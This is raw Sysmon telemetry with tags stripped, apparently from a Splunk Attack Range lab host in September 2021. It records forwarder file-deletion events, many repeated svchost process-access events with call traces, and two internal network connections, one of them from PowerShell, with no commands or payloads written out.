Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53A089F2D17818DE4703C4D57B1F7973,SHA256=128F89869B8037B014F3F6101AF27F1B019B97413131369138DE294A20BC1FCA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083626Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:16.146{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FF0197408F96F0DE756E3F1576FBE3E,SHA256=0F0C432034BFAEB40FFD1B33F156E64194598AE5DD27CB7ED7BE5E75BA2928D4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083628Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:17.366{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F252505DF784B7C67D471D96609036F4,SHA256=F55A8C9565C52547B393D3DC212E8E6CBC448FE92B4F5DFFCA4A0BD79AB40E2D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083627Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:17.366{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F24937252A905B715F9B88471F9E348B,SHA256=B37AA0C81CBBD2FCCCFB5C10EA2388EB409E95DA58E2B6074F9CA2302D9BEA6D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083630Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:42.225{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56499-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083629Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:18.412{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F31FB824DBB7B81B78BB8476DA0C00E2,SHA256=5C13CBADF12F39BB1B12C8B229A63D29250087FEE492914F20EA112247AD647D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083661Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:19.911{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083660Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:19.911{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083659Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:19.911{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083658Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:19.911{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083657Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:19.911{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083656Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:19.911{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083655Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:19.911{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083654Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:19.911{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083653Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:19.911{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083652Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:19.911{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083651Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:19.911{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083650Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:19.911{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083649Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:19.911{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083648Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:19.911{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083647Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:19.911{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083646Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:19.911{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083645Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:19.911{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083644Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:19.911{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083643Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:19.911{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083642Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:19.911{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083641Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:19.911{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083640Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:19.911{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083639Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:19.911{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083638Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:19.911{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083637Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:19.911{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083636Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:19.911{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083635Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:19.911{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083634Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:19.911{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083633Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:19.911{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035083632Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:43.108{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56500-false10.0.1.12-8000- 